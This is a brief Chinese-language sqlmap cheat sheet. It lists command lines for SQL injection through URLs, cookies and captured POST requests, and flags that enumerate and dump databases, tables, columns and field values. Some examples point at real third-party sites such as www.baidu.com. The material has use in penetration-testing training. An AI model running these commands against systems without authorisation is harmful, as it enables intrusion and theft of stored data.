基本格式
sqlmap -u "http://www.vuln.cn/post.php?id=1"
默认使用level1检测全部数据库类型
sqlmap -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --level 3
指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)
cookie注入
当程序有防get注入的时候,可以使用cookie注入
sqlmap -u "http://www.baidu.com/shownews.asp" --cookie "id=11" --level 2(只有level达到2才会检测cookie)
从post数据包中注入
可以使用burpsuite或者temperdata等工具来抓取post包
sqlmap -r "c:\tools\request.txt" --batch --dbs
使用sqlmap的语句
--dbs 查看所有数据库
--current-db 查看当前数据库(拖库)
--tables -D "数据库名" 查看当前数据库表 (拖表)
--columns -D "数据库名" -T "表名" 查看当前数据库当前表的列 (拖列)
--dump -C"列名" -D "数据库名" -T "表名" 查看当前数据库当前表当前列字段值 (拖字段)